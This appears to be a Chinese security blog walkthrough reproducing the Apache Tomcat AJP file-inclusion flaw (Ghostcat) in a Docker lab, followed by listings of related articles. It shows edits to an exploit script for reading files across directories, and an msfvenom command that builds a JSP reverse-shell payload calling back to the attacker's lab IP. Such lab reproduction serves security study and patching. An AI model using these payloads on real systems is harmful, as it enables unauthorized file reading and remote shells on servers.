【漏洞复现】Apache Tomcat AJP文件包含漏洞(CNVD-2020-1048)

最新推荐文章于 2025-10-28 17:08:14 发布
原创 最新推荐文章于 2025-10-28 17:08:14 发布 · 1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #安全漏洞 #安全 #渗透测试 #漏洞复现

本文详细介绍如何在特定版本的Apache Tomcat中复现并利用跨目录读取漏洞,包括环境搭建、跨目录读取、反弹shell等步骤,以及如何通过修改脚本进一步利用文件上传漏洞。

1.影响版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

2.复现

2.1准备
攻击机:kali 192.168.227.130
centos7 192.168.227.132
docker
工具:
six
2.2环境搭建
选取一个版本受影响的Tomcat,这里用Docker hub上的9.0.30版本的Tomcat镜像来复现
下载镜像

docker pull tomcat:9.0.30-jdk8-adoptopenjdk-hotspot

运行容器

docker run --rm -p 8009:8009 -p 8080:8080 -d tomcat:9.0.30-jdk8-adoptopenjdk-hotspot

在这里插入图片描述
进入容器里的/usr/local/tomcat目录, 将webapps.dist下的内容复制到webapps目录下
在这里插入图片描述

sudo docker exec -it f1fb52142e4d(容器id) /bin/bash

在这里插入图片描述

cp -r webapps.dist/* webapps/

访问8080端口,查看Tomcat是否正常运行
在这里插入图片描述

3.跨目录读取

nmap扫描
在这里插入图片描述
发现开放8009和8080端口
可用用脚本读取ROOT目录下的文件,如果想读取webapps其他目录下的文件, 可以对脚本进行简单的修改
修改脚本里的“/asdf”就可以实现跨目录读取. 比如我们要读取test目录下的test.txt

_,data = t.perform_request('/test/asdf',attributes=[

在这里插入图片描述
在webapps下的创建一个test目录, 放上一个test.txt文件
在这里插入图片描述
然后用修改后的脚本读取这个文件即可
在这里插入图片描述

4.反弹shell

如果服务器同时存在文件上传漏洞, 则可以进一步取得shell. 我们先修改一下脚本, 在“/asdf”后面加上“.jsp”即可

_,data = t.perform_request('/asdf.jsp',attributes=[

在这里插入图片描述
生成Payload, 其中192.168.227.130是攻击者地址

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.227.130 LPORT=4444 > shell.txt

设置好payload,然后开始监听
在这里插入图片描述
将shell.txt放到webapps的ROOT目录下后,运行脚本
在这里插入图片描述
附(拷贝本地文件到docker容器)
1,确定我们的容器名,并获取容器长ID

docker inspect -f '{{.ID}}' frosty_feynman

2,拷贝本地文件到容器

docker cp 你的文件路径 容器长ID:docker容器路径

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得到shell
在这里插入图片描述

漏洞复现Apache Tomcat AJP文件包含漏洞(CVE-2020-1938)
晚风不及你
01-12 1204
Apache Tomcat 是一个免费的开源 Web 应用服务器,在中小型企业和个人开发用户中有着广泛的应用。
13-3 tomcat AJP文件包含漏洞(CVE-2020-1938)
weixin_43263566的博客
12-02 1430
CVE-2020-1938 是一个影响 TomcatAJP文件包含漏洞。攻击者可以利用该漏洞通过 Tomcat AJP Connector 读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如配置文件或源码。如果目标应用有文件上传功能,攻击者还可以利用文件包含漏洞实现远程代码执行,造成严重的安全风险。这一漏洞的发现者为长亭科技安全研究员。由于 Tomcat AJP 协议设计上的缺陷,该漏洞存在于 Tomcat 中。影响范围ApacheTomcat 6Apache
apache Tomcat 漏洞
09-27
apache Tomcat 漏洞
Apache Tomcat文件包含漏洞复现(详细教程)
最新发布
2509_93930198的博客
10-28 1073
TomcatApache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接,Connector表示接收请求并返回响应的端点。即Connector组件负责接收客户的请求,以及把Tomcat服务器的响应结果发送给客户。
Apache Tomcat CVE-2020-1938 漏洞
weixin_51194266的博客
06-21 1万+
所选漏洞Apache Tomcat远程代码执行漏洞 漏洞编号:CVE-2020-1938 简单的环境搭建与POC验证
Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549和CVE-2024-34750排查处理
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
08-14 7818
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
Apache Tomcat漏洞总结
热门推荐
星落的博客
04-17 2万+
CVE-2017-12615 任意写文件漏洞 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件 然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用`/`)来绕过了限制。 AJP 文件包含漏洞(CVE-2020-1938) 由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文.
Apache-Tomcat-Ajp幽灵猫漏洞复现(cve-2020-1938|CNVD-2020-10487)
Sylon的博客
03-18 2887
漏洞说明# ApacheTomcat都是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。 Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。 漏洞危害# 由于Tomcat默认开启的AJP服务。端口号为8009,攻击者可构...
复现awvs——CVE-2020-1938(CNVD-2020-10487)tomcat ajp 文件包含漏洞
碧海朝天素
03-20 307
一、漏洞介绍======2月20日,国家信息安全漏洞共享平台(CNVD)发布了该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。目前,厂商已发布新版本完成漏洞修复。TomcatApache软件基金会中的一个重要项目,性能稳定且免费,是目前较为流行的Web应用服务器。由于Tomcat应用范围较广,因此本次通告的漏洞影响范围较大,请相关用户及时采取防护措施修复此漏洞
Apache Tomcat 远程代码执行漏洞(CVE-2025-24813) 超详细!
欢迎来到我的博客,这里是我分享Python开发心得与信息安全探索的乐园。作为一名热衷于编程与安全的技术爱好者,我始终致力于在Python的世界里深耕细作,探索其强大的功能与无限的可能性。同时,信息安全也是我关注的重点,我深知在这个数字化时代,保护数据安全的
03-14 1万+
远程代码执行漏洞(CVE-2025-24813)源于 Apache Tomcat 的反序列化机制未对用户输入进行严格验证,攻击者可通过构造恶意序列化对象绕过安全限制,处理部分 PUT 请求时,攻击者利用临时文件路径处理中的缺陷(将路径分隔符"/"替换为“.”),通过特定条件(如启用默认 servlet 的写入功能)实现远程代码执行并控制服务器‌。‌将 Apache Tomcat 升级至安全版本(Tomcat 11.0.2+、10.1.34+、9.0.98+),以修复反序列化漏洞及 PUT 请求处理缺陷‌。
Apache Tomcat 漏洞复现
来日可期的博客
09-08 5893
Tomcat7 弱密码和后端 Getshell 漏洞,Aapache Tomcat AJP任意文件读取/包含漏洞,通过 PUT 方法的 Tomcat 任意写入文件漏洞
Apache Tomcat 问题漏洞
weixin_45816407的博客
08-08 1806
Apache Tomcat 环境问题漏洞(CVE-2022-42252)Apache Tomcat 信息泄露漏洞(CVE-2023-28708)建议直接升级tomcat的小版本,即就是升级到最新版本注:跨版本升级请自行百度。
Apache Tomcat输入验证码错误漏洞(CVE-2023-46589)
qq_58733481的博客
09-25 2117
Apache Tomcat存在输入验证错误漏洞,该漏洞源于HTTP/2请求的输入验证不正确,会导致拒绝服务。目前,官方漏洞修复版本已经发布。建议用户升级到安全修复版本: 8.0.x 用户升级组件到 8.5.99 版;9.0.x 用户升级组件到 9.0.86 版;11.0.x 用户升级组件到 11.0.0-M17 版。问题:检测到存在待处理的应用漏洞Apache Tomcat 输入验证错误漏洞(CVE-2023-46589),扫描到服务器存在漏洞风险,建议立即对相关主机进行快照备份,避免遭受损失。
Apache - Tomcat 漏洞集合
Beret-81的博客
03-29 1万+
Tomcat 漏洞集合及利用一、Tomcat 几个高危漏洞1、Tomcat 远程代码执行漏洞 (CVE-2017-12615)2、Apache Tomcat样例目录session操纵漏洞2、Apache Tomcat样例目录session操纵漏洞2、Apache Tomcat样例目录session操纵漏洞2、Apache Tomcat样例目录session操纵漏洞二、Tomcat 服务器安全配置 ...
Apache Tomcat - 远程代码执行漏洞 - CVE-2024-50379
Blue17 の 小窝
02-16 2448
部分版本 Apache Tomcat 由于在验证文件路径时存在缺陷,如果 readonly 参数被设置为 false(这是一个非标准配置),并且服务器允许通过 PUT 方法上传文件,那么攻击者就可以上传含有恶意 JSP 代码的文件。通过不断的发送请求,攻击者可以利用条件竞争漏洞,使得 Tomcat 解析并执行这些恶意文件,从而实现远程代码执行。
漏洞分析 | Apache Tomcat远程代码执行漏洞(CVE-2025-24813)
WangsuSecurity的博客
04-25 940
目前该漏洞POC状态已在互联网公开,建议尽快做好自查及防护
Apache Tomcat RCE漏洞复现(CVE-2025-24813)
weixin_55010563的博客
03-15 1310
使用 partial PUT 请求将恶意的序列化数据写入到会话文件中,在开启文件会话持久化(默认存储位置),并且在文件上传未完成的情况下,内容会被临时存储在 Tomcat 的工作目录work\Catalina\localhost\ROOT。尝试使用 Tomcat 9.0.98 版本复现:https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98.zip。
tomcat-ajp-cve-2020-1938 漏洞复现
04-05
Tomcat AJP 协议中的文件包含漏洞(CVE-2020-1938)允许攻击者通过构造恶意请求来读取服务器上的任意文件。此漏洞源于 AJP 协议处理不当,可能导致敏感数据泄露甚至远程代码执行。 --- #### 攻击原理 AJP 是一种二...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值